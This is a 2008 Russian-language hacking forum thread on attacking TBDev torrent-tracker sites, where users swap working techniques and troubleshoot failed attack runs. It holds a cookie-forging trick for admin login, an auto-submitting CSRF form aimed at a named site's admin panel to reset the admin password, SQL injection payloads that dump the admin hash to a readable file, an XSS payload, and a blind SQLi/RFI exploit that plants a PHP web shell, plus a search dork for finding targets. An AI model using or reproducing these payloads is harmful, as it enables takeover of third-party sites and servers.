ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

25.09.2008, 02:09
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме: 10605912
Репутация:
4693
|
|
У меня:
Cookie:
uid=2; pass=13b5c2e3dc4472ed1d28dfe3f6649ffe; mybbuser=2_WoFEnvzPlYkFEqbT2cYZef8HbAl1ElldsmX9617 7j7x9HMPQ3N
Жирным выделил то, что нужно поменять на passhash + не забудь uid сменить на 1. НА mybb* - забей, это для форума, сплоит эти поля не достаёт.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
Последний раз редактировалось Qwazar; 25.09.2008 в 02:14..
|
|
|

25.09.2008, 12:29
|
|
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме: 355954
Репутация:
32
|
|
Спасибо все получилось.
Еще вопрос.
Реально с админки шел залить?
|
|
|

25.09.2008, 16:57
|
|
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме: 6520559
Репутация:
2947
|
|
как вариант ... конечно ... заифреймить админу такую HTML -ку
Код HTML:
<body onload="p.submit()">
<form action="http://megalife.kz/torrent/admincp.php?op=iUsers" method="post" id="p">
<input type=hidden name="iname" value="ИМЯ_АДМИНА">
<input type=hidden name="ipass" value="НОВЫЙ_ПАРОЛЬ">
<input type=hidden name="imail" value="МАЙЛ_АДМИНА@mail.ru">
<input type=hidden name="isub" value="%D1%E4%E5%EB%E0%F2%FC">
<input type=hidden name="op" value="iUsers">
Как вы уже все поняли ... это сменит пароль нужному нам пользователю.... проявите немного фантазии и дело за малым 
|
|
|

03.11.2008, 13:07
|
|
Познающий
Регистрация: 19.08.2008
Сообщений: 69
Провел на форуме: 458484
Репутация:
31
|
|
C:\php>php.exe sql.php http://adrez/ 1 123123123 123123
http://adrez/:123123123:123123
Trying to get your cookies... [DONE]
Trying to get passhash:
Exploit failed
Пробывал сайтах на 5 везде одно и тоже .. Кто может помоч?
|
|
|

10.11.2008, 02:02
|
|
Участник форума
Регистрация: 25.10.2006
Сообщений: 108
Провел на форуме: 495411
Репутация:
91
|
|
Сообщение от Uname-A
C:\php>php.exe sql.php http://adrez/ 1 123123123 123123
http://adrez/:123123123:123123
Trying to get your cookies... [DONE]
Trying to get passhash:
Exploit failed
Пробывал сайтах на 5 везде одно и тоже .. Кто может помоч?
Я попробую тебе помоч -))
измени target_id с 1 на 3 или 4 или 10 ... вопщем посмотри id админа сначало и ставь его туда ...
Т.к при установке этого движка в базу прописываеца не 1 ... у меня на локалхосте он равнялся 3
Последний раз редактировалось n-000; 10.11.2008 в 02:04..
|
|
|

21.11.2008, 13:02
|
|
Участник форума
Регистрация: 25.12.2006
Сообщений: 220
Провел на форуме: 2544458
Репутация:
243
|
|
сделал видео _http://letitbit.net/download/262433962218/qwazar-sploit.rar.html
_http://rapidshare.com/files/165895736/qwazar_sploit.rar.html
Чтобы небыло вопросов, php из видео скачан отсюда _http://php.ru/download/php-5.2.1-Win32.zip
Последний раз редактировалось Витян; 21.11.2008 в 13:15..
|
|
|

23.11.2008, 23:43
|
|
Новичок
Регистрация: 20.11.2008
Сообщений: 10
Провел на форуме: 54375
Репутация:
16
|
|
активные XSS в полях Email, Имя в AIM, Ваш MSN, Имя в Yahoo!, Имя в mIRC!, Сайт.
Все работает если вводить при реге, если редактировать после реги, работать не будет.
В поле Email скуля, тоесть при реге вводим мыло вида ' group by 100/*@blablabla.ru
выдает что количество колонок не верное.
Пример получения хеша админа:
в поле имейл пишем :' union select passhash from users where id=1 into outfile '../../../usr/local/www/torrent/torrents/images/1.txt'/* -- @ukrnet.ua
по адрессу h**p://сайт/torrents/images/1.txt смотрим хеш юзера с id=1
пассивная хss www.site.ru/redir.php?url='><script>alert(/xak/)</script>
Последний раз редактировалось злойдядька; 08.12.2008 в 13:20..
|
|
|
TBDev2 Blind SQL Injection+RFI Exploit |

05.12.2008, 00:50
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме: 10605912
Репутация:
4693
|
|
TBDev2 Blind SQL Injection+RFI Exploit
Сплоит для TBDev 2.0. , от паблик версии отличается тем, что пытается залить шелл на сервер, помимо поиска пасса/соли. Если шелл залить не удаётся, значит вместо RFI прийдётся использовать LFI, или на сервере не работает функция file_put_contents, которую вполне можно заменить на обычный fopen/fwrite.
LFI/RFI в админке используя параметр admincp.php?rootpath=.
Если register_globals ON, то LFI/RFI доступны и не из админки, а из index.php, тот же параметр.
Читайте комментарии к сплоиту, для заливки шелла, нужно положить код
Код:
<?php
file_put_contents("torrents/.htaccess", "");
file_put_contents("torrents/shell.php", "<? system(\$_GET['cmd']) ?>");
?>
В файл доступный для чтения, на вашем сервере и прописать путь к нему в переменной $uploader.
Так же сплоит может просто вытащить хеш, соль не закачивая шелл. Используется алгоритм бинарного поиска, так что запросов шлётся относительно немного, для слепой скули. (максимум 4 запроса на символ, вместо стабильно 16 при полном переборе, т.е. работает минимум в 4 раза быстрее, чем при полном переборе. И вообще для всех сплоитов со слепыми скулями, использующих BENCHMARK или перебор имён таблиц, стоит использовать алгоритм бинарного поиска, так быстрее)
P.S.
В каталоге 'admin' вообще лежит файлик (core.php) следующего содержания:
Код:
$op = (!isset($_REQUEST['op'])) ? "Main" : $_REQUEST['op'];
foreach ($_GET as $key => $value)
$GLOBALS[$key] = $value;
foreach ($_POST as $key => $value)
$GLOBALS[$key] = $value;
foreach ($_COOKIE as $key => $value)
$GLOBALS[$key] = $value;
Этот файл инклудится в admin.php .
Dork:"Powered by TBDev v2.0"
Качать тут: http://www.x2b.ru/get/14887
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|

08.12.2008, 23:00
|
|
Новичок
Регистрация: 02.11.2008
Сообщений: 5
Провел на форуме: 16201
Репутация:
0
|
|
&
Can't create/write to file '..\..\..\usr\local\www\torrent\torrents\images\1. txt' (Errcode: 2)
|
|
|

09.12.2008, 14:31
|
|
Новичок
Регистрация: 11.08.2008
Сообщений: 8
Провел на форуме: 40881
Репутация:
7
|
|
Запрос в поле майл делаю правильно новсе время вылетает ошибка
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/* -- @uspp.ru'' at line 1
хотя на локальной машине все робит на ура вчем проблема может быть ?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|